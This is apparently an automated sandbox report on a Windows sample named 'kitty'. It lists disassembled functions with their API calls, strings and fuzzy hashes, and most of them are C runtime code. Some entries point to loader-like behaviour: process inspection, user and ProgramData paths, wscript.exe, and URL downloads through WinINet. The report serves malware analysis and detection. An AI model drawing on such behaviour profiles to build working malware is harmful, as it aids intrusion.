_free.LIBCMT ref: 00205C89
_free.LIBCMT ref: 00205C90
_free.LIBCMT ref: 00205CAD
_free.LIBCMT ref: 00205CC5

Strings

!, xrefs: 00205C74
`!, xrefs: 00205B9E

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: `!$!
API String ID: 161543041-3480544214
Opcode ID: d8f7e478b72c9c56e78c1deb8f0ef6442be07efd3ec3ee3ca31dd33f5da9d54b
Instruction ID: c8722678af96079513f01189852084bfc718bbdf3c1df079d5c753a910d5d18c
Opcode Fuzzy Hash: d8f7e478b72c9c56e78c1deb8f0ef6442be07efd3ec3ee3ca31dd33f5da9d54b
Instruction Fuzzy Hash: 82314B71618B169FEB21AE38DC85B6B77E8EF10350F14481AE55AD7192DF71ACA0CF20

Function 00204F32 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 373COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00204F7A
_free.LIBCMT ref: 00204F9E
_free.LIBCMT ref: 00204FAB
_free.LIBCMT ref: 00204FD0
_free.LIBCMT ref: 00204FDD
_free.LIBCMT ref: 00204FE6
_free.LIBCMT ref: 002052C0
_free.LIBCMT ref: 002052C8

Strings

`!, xrefs: 00205245
`!, xrefs: 00204F60

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free
String ID: `!$`!
API String ID: 269201875-374183871
Opcode ID: aa5cff566b19491dae86a780382752a2dde622964d5a523b545d896a43c1ffcb
Instruction ID: c6699d9703d103e20416795bf5bade5a228f95a84200d9be637cfc0060d319db
Opcode Fuzzy Hash: aa5cff566b19491dae86a780382752a2dde622964d5a523b545d896a43c1ffcb
Instruction Fuzzy Hash: 31C12172E50309AFDB20DBA8DC82FEE77F8AF18710F144165FA05EB2C6D67099508B64

Function 001F764A Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001F76B9
_free.LIBCMT ref: 001F76CF
_free.LIBCMT ref: 001F76E2
_free.LIBCMT ref: 001F76F7
_free.LIBCMT ref: 001F770C
GetCPInfo.KERNEL32(?,?), ref: 001F7756

Part of subcall function 002013AA: _free.LIBCMT ref: 00201415

_free.LIBCMT ref: 001F79C1
_free.LIBCMT ref: 001F79D4
_free.LIBCMT ref: 001F79E2
_free.LIBCMT ref: 001F79ED
_free.LIBCMT ref: 001F7A2F
_free.LIBCMT ref: 001F7A37
_free.LIBCMT ref: 001F7A3D
_free.LIBCMT ref: 001F7A45
_free.LIBCMT ref: 001F7A53

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 80ee051a8a29646d145d304bc66191e804e662ca8dc876bde0a12b8735ab28fd
Instruction ID: 995e41454ec02eb2fc961ee35f8cf1c0603f7f794e74de386589fca52cab5acf
Opcode Fuzzy Hash: 80ee051a8a29646d145d304bc66191e804e662ca8dc876bde0a12b8735ab28fd
Instruction Fuzzy Hash: 55D168719043099FDB11DFB8CC81BBEBBF5BF18300F144569EA99AB282D771A945CB60

Function 001D13C0 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 332COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?), ref: 001D13DD
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,?), ref: 001D13FB
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,?), ref: 001D1405
GetCurrentProcessId.KERNEL32(?,?,00000000,00000000,?,00000104,?,?), ref: 001D144A
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 001D1455
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 001D175F

Strings

LOCALAPPDATA, xrefs: 001D14DD
USERPROFILE, xrefs: 001D1522
APPDATA, xrefs: 001D1497
C:\Windows\Microsoft.NET, xrefs: 001D1632
wscript.exe, xrefs: 001D15A2
C:\ProgramData, xrefs: 001D16A2

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: CloseHandle$Process$CurrentFileModuleNameOpen
String ID: APPDATA$C:\ProgramData$C:\Windows\Microsoft.NET$LOCALAPPDATA$USERPROFILE$wscript.exe
API String ID: 1772831937-2916873119
Opcode ID: dc16ccf037c87fd3e03fc279831f9a792475608a619b4ca580cc4bff735a86d9
Instruction ID: f754bef11f4ad0ab29754b198308cfb7574505f3a4cbdc1c0df834c92a95316d
Opcode Fuzzy Hash: dc16ccf037c87fd3e03fc279831f9a792475608a619b4ca580cc4bff735a86d9
Instruction Fuzzy Hash: 42B12372E00204BBDB10DBA8DC81BBEB779EF51350F5442AAE819A7392D735ED46C750

Function 001DB570 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001DB585
std::_Lockit::_Lockit.LIBCPMT ref: 001DB5A0
std::_Lockit::~_Lockit.LIBCPMT ref: 001DB5C0
std::_Lockit::~_Lockit.LIBCPMT ref: 001DB611
std::_Facet_Register.LIBCPMT ref: 001DB707
std::_Lockit::~_Lockit.LIBCPMT ref: 001DB71F
Concurrency::cancel_current_task.LIBCPMT ref: 001DB72D
Concurrency::cancel_current_task.LIBCPMT ref: 001DB732
Concurrency::cancel_current_task.LIBCPMT ref: 001DB737

Strings

true, xrefs: 001DB6D8
false, xrefs: 001DB6B2

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: std::_$Lockit$Concurrency::cancel_current_taskLockit::~_$Lockit::_$Facet_Register
String ID: false$true
API String ID: 1941589060-2658103896
Opcode ID: 52b093754a133d9408421ae4649d8d15fc1aa1c6afe95b2c3d725b254f09b21f
Instruction ID: d36c3f27fad8aefd6a5883b2ebfcaded07eb780cee3de13af5f7a8929004fe59
Opcode Fuzzy Hash: 52b093754a133d9408421ae4649d8d15fc1aa1c6afe95b2c3d725b254f09b21f
Instruction Fuzzy Hash: 6D51E875A05744CFCB24DFA5E991AADB7A0AF64310F05806EEC169B352EB31ED01CB81

Function 001FBAD8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001FBAEE

Part of subcall function 001FBF97: HeapFree.KERNEL32(00000000,00000000,?,00205589,?,00000000,?,?,?,0020582C,?,00000007,?,?,00205D1F,?), ref: 001FBFAD
Part of subcall function 001FBF97: GetLastError.KERNEL32(?,?,00205589,?,00000000,?,?,?,0020582C,?,00000007,?,?,00205D1F,?,?), ref: 001FBFBF

_free.LIBCMT ref: 001FBAFA
_free.LIBCMT ref: 001FBB05
_free.LIBCMT ref: 001FBB10
_free.LIBCMT ref: 001FBB1B
_free.LIBCMT ref: 001FBB26
_free.LIBCMT ref: 001FBB31
_free.LIBCMT ref: 001FBB3C
_free.LIBCMT ref: 001FBB47
_free.LIBCMT ref: 001FBB55

Strings

0!!, xrefs: 001FBAE5

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 0!!
API String ID: 776569668-467417407
Opcode ID: b25f2def26a0116777c12650e471463f9622edf75fec48e7ab8b8360f30c65db
Instruction ID: 9df7165bd898f3900f8701b814fe923145625b467f36686e15e7919c5301f71b
Opcode Fuzzy Hash: b25f2def26a0116777c12650e471463f9622edf75fec48e7ab8b8360f30c65db
Instruction Fuzzy Hash: 8E21757690420CAFCB41EF94CC81DEE7BB9AF18354B004565B615DB521DB31DA54CF80

Function 00205351 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002053BF
_free.LIBCMT ref: 002053CB
_free.LIBCMT ref: 002054F4
_free.LIBCMT ref: 002054FF

Strings

`!, xrefs: 0020537C

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free
String ID: `!
API String ID: 269201875-34384056
Opcode ID: 63668322225c1b7ae8c26fa7b33f6d1e5773e5816359e70ced53663905031a4d
Instruction ID: 1fd1d1df4bf3f830749b36e4d9c0d9fe5bcdc23445a88826af5ce92a913eb40e
Opcode Fuzzy Hash: 63668322225c1b7ae8c26fa7b33f6d1e5773e5816359e70ced53663905031a4d
Instruction Fuzzy Hash: 0661C172924715AFDB20DF64CC81BABBBE9EF54310F204469E956EB2C2EB709D508F50

Function 001F2E28 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 001F2F25
type_info::operator==.LIBVCRUNTIME ref: 001F2F47
___TypeMatch.LIBVCRUNTIME ref: 001F3056
IsInExceptionSpec.LIBVCRUNTIME ref: 001F3128
_UnwindNestedFrames.LIBCMT ref: 001F31AC
CallUnexpected.LIBVCRUNTIME ref: 001F31C7

Strings

csm, xrefs: 001F2ED2
csm, xrefs: 001F2F7E
csm, xrefs: 001F2E65

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 22b5ba48bd6cd4b67ff9ce74b0138dec94d8eae385e6f2a7819de38c5ba0afd5
Instruction ID: f12a0f7b5ab99aa32e4ca3c2b63f021b6886011df962e18636cb2ec79328da25
Opcode Fuzzy Hash: 22b5ba48bd6cd4b67ff9ce74b0138dec94d8eae385e6f2a7819de38c5ba0afd5
Instruction Fuzzy Hash: D6B1567190020EEFCF29DFA4C8819BEBBB5BF64310B14415AFA256B212D731DA51CF91

Function 001D56B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001D56F1
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000100,00000000), ref: 001D575B
InternetCloseHandle.WININET(00000000), ref: 001D5768
InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 001D57C9
InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 001D57FB
InternetCloseHandle.WININET(00000000), ref: 001D580C
InternetCloseHandle.WININET(00000000), ref: 001D580F

Strings

Couldn't open URL!, xrefs: 001D576E
Couldn't open Internet!, xrefs: 001D584F

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Internet$CloseHandle$FileOpenRead
String ID: Couldn't open Internet!$Couldn't open URL!
API String ID: 3539267403-1021515825
Opcode ID: 7395f8541fad731c322711c5a3384a6d59cc9c4194af30d04400ab07d841a6db
Instruction ID: b949fe7932d2bc271facacae00b0687bcee624173da5c70a2f9cd98111c918e0
Opcode Fuzzy Hash: 7395f8541fad731c322711c5a3384a6d59cc9c4194af30d04400ab07d841a6db
Instruction Fuzzy Hash: 7351A371A10209ABEF14DFA5DC49FAEBB7AEF44305F108119F905B6381DB74AA44CBA0

Function 001DBA60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 001DBA77

Part of subcall function 001EE8C0: std::_Lockit::_Lockit.LIBCPMT ref: 001EE8D2
Part of subcall function 001EE8C0: std::locale::_Setgloballocale.LIBCPMT ref: 001EE8ED
Part of subcall function 001EE8C0: _Yarn.LIBCPMT ref: 001EE903
Part of subcall function 001EE8C0: std::_Lockit::~_Lockit.LIBCPMT ref: 001EE943

std::_Lockit::_Lockit.LIBCPMT ref: 001DBA8C
std::_Lockit::_Lockit.LIBCPMT ref: 001DBAA7
std::_Lockit::~_Lockit.LIBCPMT ref: 001DBAC7
__Getcoll.LIBCPMT ref: 001DBB4A
std::_Facet_Register.LIBCPMT ref: 001DBB7C
std::_Lockit::~_Lockit.LIBCPMT ref: 001DBB94

Strings

ios_base::badbit set, xrefs: 001DBA67

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Facet_GetcollInitRegisterSetgloballocaleYarn
String ID: ios_base::badbit set
API String ID: 1067193257-3882152299
Opcode ID: b941e011dc5076b768da99af2795676555699f380e41cfa4137dacf1cdc2fd0a
Instruction ID: ed88353eda0e6e8c0727a54f7886ad785cd22662d2109e08c7f1499e82d9f89c
Opcode Fuzzy Hash: b941e011dc5076b768da99af2795676555699f380e41cfa4137dacf1cdc2fd0a
Instruction Fuzzy Hash: CA412271900619DFCB24DF64D8819AEB7B4FF24310B16816BEC66AB352EB30AD01CBC1

Function 001FE9AE Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e2774a278f5796690384a730422545a956ef935f6ee0a28c70ca50d2bad3921
Instruction ID: dff679c54d13562519b666c16d1d6cc57c663d7f38e79a446fbed351e805fac3
Opcode Fuzzy Hash: 3e2774a278f5796690384a730422545a956ef935f6ee0a28c70ca50d2bad3921
Instruction Fuzzy Hash: 61C1EFB0E0824DAFDB15DF98D884BBDBBF1BF59310F144069F615AB2A2C7709942CB60

Function 001FA219 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001FBBF0: GetLastError.KERNEL32(001D1920,00000001,001D1924,001F5E6D,00000001,00000000,00000000,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBBF5
Part of subcall function 001FBBF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBC93

_free.LIBCMT ref: 001FA504
_free.LIBCMT ref: 001FA51D
_free.LIBCMT ref: 001FA55B
_free.LIBCMT ref: 001FA564
_free.LIBCMT ref: 001FA570

Strings

!, xrefs: 001FA53E
C, xrefs: 001FA375

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C$!
API String ID: 3291180501-3608532179
Opcode ID: eb5bfc63e28b25e65821dc92e34dbc330e8b84a4ed9e03c2526add2ad444d4f4
Instruction ID: e469cc8e69d1d0fa13478f9689be231743c20d7204ea9dd38ee06069b3efc7b0
Opcode Fuzzy Hash: eb5bfc63e28b25e65821dc92e34dbc330e8b84a4ed9e03c2526add2ad444d4f4
Instruction Fuzzy Hash: 62B17CB5A012199FDB24DF18CC88AADB3B4FF58304F5445A9EA0EA7351E774AE90CF41

Function 00204682 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 002046AC
_free.LIBCMT ref: 00204785
_free.LIBCMT ref: 002047B2

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 62e3b985c097b72b4c580e24bfeb5dda64cf6c651579f5c247dc5a134c0c4394
Instruction ID: 5a53f2bc4c7bb82ac1e9449de3de92270639fed5419051260da16798cf3da627
Opcode Fuzzy Hash: 62e3b985c097b72b4c580e24bfeb5dda64cf6c651579f5c247dc5a134c0c4394
Instruction Fuzzy Hash: C651F6F1D28386AFEB20BF64DC85A6D7BA4AF11710B04C56EE714971D3EBB18920CB51

Function 001F9D8E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001FFADD: HeapAlloc.KERNEL32(00000000,?,?,?,001F0A38,?,?,?,?,?,001D11E3,?,?), ref: 001FFB0F

_free.LIBCMT ref: 001F9E9D
_free.LIBCMT ref: 001F9EB4
_free.LIBCMT ref: 001F9ED1
_free.LIBCMT ref: 001F9EEC
_free.LIBCMT ref: 001F9F03

Strings

\"!, xrefs: 001F9DE1

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free$AllocHeap
String ID: \"!
API String ID: 1835388192-1899780280
Opcode ID: 674d3e74cd4e8840d6b4a310ca1137e6e64a869c8c30a01f4bb7a43631e35a5e
Instruction ID: 88a08e716e219f16580780889f742aea4c802f6def224a7a83d58a2d82ca2bc8
Opcode Fuzzy Hash: 674d3e74cd4e8840d6b4a310ca1137e6e64a869c8c30a01f4bb7a43631e35a5e
Instruction Fuzzy Hash: BA51C171A00708AFDB21EF69CC41BBAB7F5EF68720F144569EA09D7251E731E951CB40

Function 001D1B80 Relevance: 10.6, APIs: 7, Instructions: 110COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001D1B92
std::_Lockit::_Lockit.LIBCPMT ref: 001D1BAD
std::_Lockit::~_Lockit.LIBCPMT ref: 001D1BCD
std::_Lockit::~_Lockit.LIBCPMT ref: 001D1C1E
__Getctype.LIBCPMT ref: 001D1C6D
std::_Facet_Register.LIBCPMT ref: 001D1C93
std::_Lockit::~_Lockit.LIBCPMT ref: 001D1CAB

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeRegister
String ID:
API String ID: 2525760861-0
Opcode ID: d72a96d01b7e9f7795ae1c77cfc70b1ce5fe726a251d9d0bacbf4774223b0ee5
Instruction ID: e742e266162e65219d5cb5c85de2937931fbf05215849357f03e8cf0f21a9da2
Opcode Fuzzy Hash: d72a96d01b7e9f7795ae1c77cfc70b1ce5fe726a251d9d0bacbf4774223b0ee5
Instruction Fuzzy Hash: D541D972E00654ABDB24DF58E9909ADB3B4FF24710B1581BAEC199B351EB31ED41CBC1

Function 001FC204 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 001FC26F
api-ms-, xrefs: 001FC25B

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 9b8452cbc69b25cd64ba5a5e0a523e6b7a0f0a337ddebe7430911137ead3353e
Instruction ID: 2304eed1e030c7e4636977dd1dec5af0ee08b963e5f2490eb852749f362a5318
Opcode Fuzzy Hash: 9b8452cbc69b25cd64ba5a5e0a523e6b7a0f0a337ddebe7430911137ead3353e
Instruction Fuzzy Hash: 9921A576A0571CABCB218BE4DE85A7B7758DB567A0F250121FE06A7291DB30DD00E5E0

Function 00205813 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0020555F: _free.LIBCMT ref: 00205584

_free.LIBCMT ref: 00205861

Part of subcall function 001FBF97: HeapFree.KERNEL32(00000000,00000000,?,00205589,?,00000000,?,?,?,0020582C,?,00000007,?,?,00205D1F,?), ref: 001FBFAD
Part of subcall function 001FBF97: GetLastError.KERNEL32(?,?,00205589,?,00000000,?,?,?,0020582C,?,00000007,?,?,00205D1F,?,?), ref: 001FBFBF

_free.LIBCMT ref: 0020586C
_free.LIBCMT ref: 00205877
_free.LIBCMT ref: 002058CB
_free.LIBCMT ref: 002058D6
_free.LIBCMT ref: 002058E1
_free.LIBCMT ref: 002058EC

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
Instruction ID: 511132d7e6bf06b27831a67dbc3f08b304251e77fa1270adfbf6953109e53a2e
Opcode Fuzzy Hash: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
